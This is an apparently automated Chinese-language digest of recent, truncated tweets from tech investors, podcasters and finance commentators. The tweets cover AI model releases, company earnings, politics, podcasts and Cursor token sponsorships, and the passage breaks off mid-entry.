Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi,…\n[原文链接](https://x.com/eladgil/status/2049615184730132940)\n\n**[2026-04-27T20:41:36+00:00]**\n> Mon afternoon song 2 (remix much better then original) https://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048865167233200586)\n\n**[2026-04-27T20:35:37+00:00]**\n> Mon afternoon song https://www.youtube.com/watch?v=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048863662396658146)\n\n**[2026-04-27T16:36:07+00:00]**\n> RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil\n[原文链接](https://x.com/eladgil/status/2048803386938495412)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n---\n\n### ✅ @DavidSacks — David Sacks(20 条)\n\n**[2026-04-30T18:34:10+00:00]**\n> RT by @DavidSacks: Co-sign.\n[原文链接](https://x.com/DavidSacks/status/2049920259432513702)\n\n**[2026-04-30T17:45:25+00:00]**\n> It’s time to demystify Mythos. Mythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). OpenAI’s GPT-5.5-cyber can now do the s…\n[原文链接](https://x.com/DavidSacks/status/2049907993588769006)\n\n**[2026-04-27T17:47:07+00:00]**\n> Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.\n[原文链接](https://x.com/DavidSacks/status/2048821257534111863)\n\n**[2026-04-27T17:16:26+00:00]**\n> R to @DavidSacks: x.com/a16z/status/1985413352…\n[原文链接](https://x.com/DavidSacks/status/2048813533136060459)\n\n**[2026-04-27T17:15:33+00:00]**\n> R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian f…\n[原文链接](https://x.com/DavidSacks/status/2048813311668486300)\n\n**[2026-04-27T17:08:20+00:00]**\n> Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.\n[原文链接](https://x.com/DavidSacks/status/2048811495224390105)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(20 条)\n\n**[2026-05-01T00:55:00+00:00]**\n> Why Dario at Anthropic has such a hard job predicting compute demands? \"The stakes are enormous and the margin for error is tiny. For every dollar of revenue, you may need $4–5 in upfront compute inv…\n[原文链接](https://x.com/HarryStebbings/status/2050016099606118504)\n\n**[2026-04-30T20:39:00+00:00]**\n> Multi-year contracts don't matter. \"Deferred churn is still churn, it just shows up later. Long contracts do not mean customers are loyal, they just delay the moment they leave. If a better solution …\n[原文链接](https://x.com/HarryStebbings/status/2049951674891203065)\n\n**[2026-04-30T17:35:00+00:00]**\n> What the public markets are getting wrong about the SaaS-pocalypse \"The public markets are directionally right, but missing the real shift. The threat is not AI tools themselves, it is the agents dec…\n[原文链接](https://x.com/HarryStebbings/status/2049905369963745470)\n\n**[2026-04-30T14:03:29+00:00]**\n> R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK Youtube: https://youtu.be/aXToQKc430c Apple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raise…\n[原文链接](https://x.com/HarryStebbings/status/2049852141334904978)\n\n**[2026-04-30T14:03:29+00:00]**\n> This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference. - Anthropic Raises $45BN but Falls Short on Compute - Are OpenAI Back in the Game with GPT5.5 & Codex? - W…\n[原文链接](https://x.com/HarryStebbings/status/2049852139690754293)\n\n**[2026-04-30T03:01:00+00:00]**\n> \"Being physically present is not the same as being mentally present. That is the real challenge, balancing a demanding company with truly showing up for your family. It is incredibly hard to be great…\n[原文链接](https://x.com/HarryStebbings/status/2049685420926202329)\n\n**[2026-04-30T01:07:00+00:00]**\n> \"Token budgeting and leaderboards are flawed if they are not tied to outcomes. If you just incentivise usage, people will generate activity, not value, and burn money. The goal should be aligning tok…\n[原文链接](https://x.com/HarryStebbings/status/2049656731672924644)\n\n**[2026-04-29T23:17:00+00:00]**\n> \"Most people are not ready for the AI future inside companies. It requires a real step change in skills and mindset. And as companies transition, not adapting will become a blocker, which is why more…\n[原文链接](https://x.com/HarryStebbings/status/2049629049174057023)\n\n**[2026-04-29T21:39:00+00:00]**\n> \"The problem with short sellers is the asymmetry. They can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong. Meanwhile, public companie…\n[原文链接](https://x.com/HarryStebbings/status/2049604386628960684)\n\n**[2026-04-29T20:46:16+00:00]**\n> A lot of people say they want to win, but the honest truth is they don’t. Wanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want t…\n[原文链接](https://x.com/HarryStebbings/status/2049591116928877011)\n\n**[2026-04-29T19:46:00+00:00]**\n> \"Really good people figure things out on their own. They do not need constant mentorship, reviews or handholding. If someone needs that level of support, they are likely not the kind of A player you …\n[原文链接](https://x.com/HarryStebbings/status/2049575949344157929)\n\n**[2026-04-29T17:36:00+00:00]**\n> Why this $160 billion company does not have a product organization? \"We do not have a separate product organization, our engineers are the product managers. In an AI native world, engineers need to b…\n[原文链接](https://x.com/HarryStebbings/status/2049543233735106652)\n\n**[2026-04-29T15:04:00+00:00]**\n> Do Rich Founders Make For Bigger Exits: \"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash. Had I not had the singles before, it might have been something …\n[原文链接](https://x.com/HarryStebbings/status/2049504982261714970)\n\n**[2026-04-29T01:24:00+00:00]**\n> \"SBC becomes a problem when stock prices fall and dilution explodes. What was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape. The fix is to be far more s…\n[原文链接](https://x.com/HarryStebbings/status/2049298621951058341)\n\n**[2026-04-29T00:05:00+00:00]**\n> \"No, layoffs alone will not fix the problem. If a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity. The real issue is culture and talent quality, and…\n[原文链接](https://x.com/HarryStebbings/status/2049278741583643076)\n\n**[2026-04-28T22:24:00+00:00]**\n> \"You cannot have only A players in every role, some functions are just there to keep the business running. But you can build a team where the people you keep are the highest performers in those roles…\n[原文链接](https://x.com/HarryStebbings/status/2049253323329704378)\n\n**[2026-04-28T21:21:16+00:00]**\n> I am worried by the constraining exit options for venture backed companies: 1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has be…\n[原文链接](https://x.com/HarryStebbings/status/2049237538901020767)\n\n**[2026-04-28T20:31:00+00:00]**\n> Do the majority of company teams need to be rebuilt for the technology we have today? \"Yes, teams need to be rebuilt for the AI era. If roles are going to be automated or not adapting fast enough, yo…\n[原文链接](https://x.com/HarryStebbings/status/2049224886128722345)\n\n**[2026-04-28T18:28:00+00:00]**\n> The Best Founders are Not Motivated by Money: \"Founders don't tend to be motivated by money as well. The best are motivated by personal growth development, being inspired, finding things intellectual…\n[原文链接](https://x.com/HarryStebbings/status/2049193932144164986)\n\n**[2026-04-28T15:14:00+00:00]**\n> Why investors need to give CEOs better comp packages: \"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap. For …\n[原文链接](https://x.com/HarryStebbings/status/2049145110491967672)\n\n---\n\n### ✅ @jason — Jason Calacanis(20 条)\n\n**[2026-05-01T01:04:19+00:00]**\n> 😂😂😂@ATLHawks\n[原文链接](https://x.com/jason/status/2050018446616797370)\n\n**[2026-05-01T00:38:13+00:00]**\n> No comment\n[原文链接](https://x.com/jason/status/2050011874989649946)\n\n**[2026-05-01T00:38:00+00:00]**\n> Whoever is running the hawks social is a savage 😂\n[原文链接](https://x.com/jason/status/2050011821914865685)\n\n**[2026-05-01T00:26:51+00:00]**\n> RT by @Jason: Image\n[原文链接](https://x.com/jason/status/2050009016105930837)\n\n**[2026-05-01T00:20:30+00:00]**\n> THIS IS INSANE 🔥 PURE DOMINATION 🤦 ATL DOES HAVE SOME GREAT RAPPERS 😂😂😂\n[原文链接](https://x.com/jason/status/2050007416964591880)\n\n**[2026-04-30T23:30:42+00:00]**\n> Very quiet @ATLHawks 🤫\n[原文链接](https://x.com/jason/status/2049994885185384483)\n\n**[2026-04-30T23:29:59+00:00]**\n> RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?\n[原文链接](https://x.com/jason/status/2049994707061911758)\n\n**[2026-04-30T23:02:00+00:00]**\n> RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream? I built that. One hour. One Claude Code session. Gary catches bad s…\n[原文链接](https://x.com/jason/status/2049987662526992390)\n\n**[2026-04-30T22:32:57+00:00]**\n> For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.\n[原文链接](https://x.com/jason/status/2049980353155064279)\n\n**[2026-04-30T22:30:40+00:00]**\n> What’s good Atlanta\n[原文链接](https://x.com/jason/status/2049979777864331542)\n\n**[2026-04-30T22:16:09+00:00]**\n> Hardwood in the ATL\n[原文链接](https://x.com/jason/status/2049976123891552679)\n\n**[2026-04-30T22:15:21+00:00]**\n> Real life! With Jose! @AlvaradoJose15\n[原文链接](https://x.com/jason/status/2049975924238569627)\n\n**[2026-04-30T21:33:17+00:00]**\n> Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). For UberX? Sure, they would need to be convinced. in a world moving to autonomy, the opportun…\n[原文链接](https://x.com/jason/status/2049965338368819443)\n\n**[2026-04-30T21:30:21+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2049964597403140486)\n\n**[2026-04-30T21:27:00+00:00]**\n> San Francisco politicians and their constituents enable this suffering. They are the cause of it, because they can stop it instantly. Today, tomorrow and every one of the last 1,000 days this has hap…\n[原文链接](https://x.com/jason/status/2049963757036536190)\n\n**[2026-04-30T21:23:23+00:00]**\n> Please stop.\n[原文链接](https://x.com/jason/status/2049962845849170234)\n\n**[2026-04-30T20:43:29+00:00]**\n> Pregame!\n[原文链接](https://x.com/jason/status/2049952806451171669)\n\n**[2026-04-30T20:32:53+00:00]**\n> The everything app! Go @uber go!\n[原文链接](https://x.com/jason/status/2049950138735407393)\n\n**[2026-04-30T20:29:30+00:00]**\n> Enjoying giving bounties in the vibecoding era Looking for someone to build annotated dot com in this podcast contest Winner gets $5k GLHF!\n[原文链接](https://x.com/jason/status/2049949284267590094)\n\n**[2026-04-30T19:18:32+00:00]**\n> RT by @Jason: J-Cal is offering a $5K bounty to whoever can execute his idea for annotated .com! Think you have what it takes? 🧵 @Jason\n[原文链接](https://x.com/jason/status/2049931426972180820)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(15 条)\n\n**[2026-04-30T21:51:45+00:00]**\n> Q1 Revenue Growth, YoY % Change... Meta $META: +33% Google $GOOGL: +22% Microsoft $MSFT: +18% Apple $AAPL: +17% Amazon $AMZN: +17% Netflix $NFLX: +16% Tesla $TSLA: +16% S&P 500 $SPY: +10%\n[原文链接](https://x.com/charliebilello/status/2049969984432914819)\n\n**[2026-04-30T21:16:00+00:00]**\n> Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year…\n[原文链接](https://x.com/charliebilello/status/2049960986468069507)\n\n**[2026-04-30T20:57:41+00:00]**\n> Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN https://bilello.blog/newsletter\n[原文链接](https://x.com/charliebilello/status/2049956378660200794)\n\n**[2026-04-30T20:47:59+00:00]**\n> Amazon Revenue (Billions) 2026 (est): 810 2025: 717 2024: 638 2023: 575 2022: 514 2021: 470 2020: 386 2019: 281 2018: 233 2017: 178 2016: 136 2015: 107 2014: 89 2013: 74 2012: 61 2011: 48 2010: 34 20…\n[原文链接](https://x.com/charliebilello/status/2049953936212217973)\n\n**[2026-04-30T20:35:03+00:00]**\n> Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins in…\n[原文链接](https://x.com/charliebilello/status/2049950680236827140)\n\n**[2026-04-30T18:34:04+00:00]**\n> Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).\n[原文链接](https://x.com/charliebilello/status/2049920236002963504)\n\n**[2026-04-30T18:08:56+00:00]**\n> The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX\n[原文链接](https://x.com/charliebilello/status/2049913908861792603)\n\n**[2026-04-30T17:05:02+00:00]**\n> Global Central Bank Update: -Brazil cut rates for the second month in a row, 25 bps move down to 14.50%.\n[原文链接](https://x.com/charliebilello/status/2049897830567862624)\n\n**[2026-04-30T16:02:50+00:00]**\n> RT by @charliebilello: Microsoft Revenues (Billions)... 2026 (est): 354 '25: 305 '24: 262 '23: 228 '22: 203 '21: 185 '20: 153 '19: 134 '18: 118 '17: 102 '16: 95 '15: 88 '14: 93 '13: 83 '12: 73 '11: 7…\n[原文链接](https://x.com/charliebilello/status/2049882175433015544)\n\n**[2026-04-30T15:54:48+00:00]**\n> RT by @charliebilello: Google Revenues (Billions)... 2026 (est): 476 2025: 403 2024: 350 2023: 307 2022: 283 2021: 258 2020: 183 2019: 162 2018: 137 2017: 111 2016: 90 2015: 75 2014: 66 2013: 56 2012…\n[原文链接](https://x.com/charliebilello/status/2049880154629878151)\n\n**[2026-04-30T13:36:52+00:00]**\n> Jerome Powell held 63 press conference as Fed chairman and over that time there wasn't a single question about the 40% money supply spike in 2020-21 or $18 trillion increase in the national debt duri…\n[原文链接](https://x.com/charliebilello/status/2049845442842603574)\n\n**[2026-04-30T13:24:05+00:00]**\n> RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...\n[原文链接](https://x.com/charliebilello/status/2049842225970852313)\n\n**[2026-04-30T13:08:14+00:00]**\n> RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% ta…\n[原文链接](https://x.com/charliebilello/status/2049838235866566668)\n\n**[2026-04-30T13:02:00+00:00]**\n> RT by @charliebilello: Remember this the next time you find yourself in a turbulent market with bad news: 1. You are a long-term investor 2. Diversified portfolios are resilient 3. Down markets prese…\n[原文链接](https://x.com/charliebilello/status/2049836667650089194)\n\n**[2026-04-30T13:01:56+00:00]**\n> RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest w…\n[原文链接](https://x.com/charliebilello/status/2049836652181307421)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-30T11:57:24+00:00]**\n> Crypto's current state is a bit shit 1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable 2. The …\n[原文链接](https://x.com/CryptoCred/status/2049820412754694460)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ✅ @svwang1 — 王川(硅谷)(7 条)\n\n**[2026-04-30T18:43:10+00:00]**\n> R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。\n[原文链接](https://x.com/svwang1/status/2049922524839018604)\n\n**[2026-04-30T18:36:57+00:00]**\n> 按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。 李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。\n[原文链接](https://x.com/svwang1/status/2049920960724427165)\n\n**[2026-04-30T03:56:04+00:00]**\n> Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。\n[原文链接](https://x.com/svwang1/status/2049699281616228816)\n\n**[2026-04-29T00:48:58+00:00]**\n> 旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。 和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。\n[原文链接](https://x.com/svwang1/status/2049289806241550791)\n\n**[2026-04-28T22:20:52+00:00]**\n> 人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。\n[原文链接](https://x.com/svwang1/status/2049252535689757003)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n---\n\n### ✅ @bozhou_ai — 泊舟(20 条)\n\n**[2026-04-30T08:40:01+00:00]**\n> Pinned: 五一做点不一样的。 我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇 主题很简单: 用 AI 解决一个每天浪费 10 分钟的小问题 不用炫技,不用大项目 能用、有效、有感觉就行 3 个赛道: 赛道一:省时间 把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。 赛道二:省脑力 帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评…\n[原文链接](https://x.com/bozhou_ai/status/2049770737175789619)\n\n**[2026-04-30T05:25:46+00:00]**\n> 月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂 主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了 目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀\n[原文链接](https://x.com/bozhou_ai/status/2049721852420108329)\n\n**[2026-04-30T01:29:33+00:00]**\n> 我还有十二万积分没用\n[原文链接](https://x.com/bozhou_ai/status/2049662409263272136)\n\n**[2026-04-30T00:00:12+00:00]**\n> RT by @bozhou_ai: 【Cursor官方资助的15位博主】 @cursor_ai 是一个非常有实力的AI项目,最近资助了15位AI与Web3博主1万美金额度的Token,项目和资助博主的含金量都是很不错的。 下面是资助的博主详情: 1. 杀破狼 @wolfyxbt 专注炒币、Vibe Coding与Memecoin的币圈老手. 2. 0xAA @0xAA_Science Neuro…\n[原文链接](https://x.com/bozhou_ai/status/2049639921003221037)\n\n**[2026-04-29T10:33:21+00:00]**\n> Warp 昨晚开源了。 GitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。 Warp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。 几个观察: 第一,…\n[原文链接](https://x.com/bozhou_ai/status/2049436870963085429)\n\n**[2026-04-29T10:32:33+00:00]**\n> MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。 cyrilXBT 整理的清单,分四类。 【基础】 1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法 https://cs.nyu.edu/~mohri/mlbook/ 2. Mathematics for Mach…\n[原文链接](https://x.com/bozhou_ai/status/2049436668663390575)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal …\n[原文链接](https://x.com/bozhou_ai/status/2049042369530777747)\n\n**[2026-04-28T07:51:43+00:00]**\n> memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的\n[原文链接](https://x.com/bozhou_ai/status/2049033808629129504)\n\n**[2026-04-28T07:04:22+00:00]**\n> x.com/i/article/204902020458…\n[原文链接](https://x.com/bozhou_ai/status/2049021892208521544)\n\n**[2026-04-28T00:26:49+00:00]**\n> 我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多\n[原文链接](https://x.com/bozhou_ai/status/2048921844175212590)\n\n**[2026-04-27T07:19:46+00:00]**\n> 我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好 现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了\n[原文链接](https://x.com/bozhou_ai/status/2048663377598452202)\n\n**[2026-04-27T05:49:10+00:00]**\n> RT by @bozhou_ai: 中文AI必关注12位高价值博主 AI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。 我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。 1. 摸鱼巨匠 @SunNeverSetsX AI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强 …\n[原文链接](https://x.com/bozhou_ai/status/2048640580004335669)\n\n**[2026-04-27T03:22:54+00:00]**\n> 之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。 一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。 它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广: AI 端:Claude Code…\n[原文链接](https://x.com/bozhou_ai/status/2048603768250585231)\n\n**[2026-04-27T01:15:43+00:00]**\n> 人生第一次录播客,我们和cell老师一起聊聊中转站的那些事\n[原文链接](https://x.com/bozhou_ai/status/2048571760698949641)\n\n**[2026-04-26T13:15:51+00:00]**\n> RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》 @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。 2. 0xAA @0xAA_Science 北…\n[原文链接](https://x.com/bozhou_ai/status/2048390603030032670)\n\n**[2026-04-26T13:00:17+00:00]**\n> GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵\n[原文链接](https://x.com/bozhou_ai/status/2048386685399142532)\n\n**[2026-04-25T09:18:55+00:00]**\n> RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了! 这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。 现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博…\n[原文链接](https://x.com/bozhou_ai/status/2047968587902820543)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/20477384398237330…\n[原文链接](https://x.com/bozhou_ai/status/2047891848908472433)\n\n**[2026-04-25T01:17:42+00:00]**\n> Cursor大善人,我也已经领到了,在X上获得的最大一笔收入\n[原文链接](https://x.com/bozhou_ai/status/2047847486430286317)\n\n**[2026-04-24T20:37:10+00:00]**\n> RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责 今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。 于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。 泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8…\n[原文链接](https://x.com/bozhou_ai/status/2047776887116874076)\n\n---\n\n### ✅ @lxfater — 铁锤人(19 条)\n\n**[2026-04-30T17:01:35+00:00]**\n> GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos 没差这么多呀😂\n[原文链接](https://x.com/lxfater/status/2049896961382203667)\n\n**[2026-04-30T10:21:24+00:00]**\n> Claude code 对 OpenClaw的封杀已经丧心病狂了 最近,Theo(32 万粉的硅谷科技 YouTuber) 发现: 如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费 现在Anthropic已经疯狂在毁开发者好感了 这种表里不一不是第一次了哈 之前 Claude Code 负责人 Boris Cherny,在…\n[原文链接](https://x.com/lxfater/status/2049796253471453564)\n\n**[2026-04-30T09:26:25+00:00]**\n> 说一下我是如何用AI工具的: Xai的Gork的搜索能力很强的,我经常使用来做搜索。 Cluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。 而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。\n[原文链接](https://x.com/lxfater/status/2049782414323388714)\n\n**[2026-04-30T07:34:19+00:00]**\n> 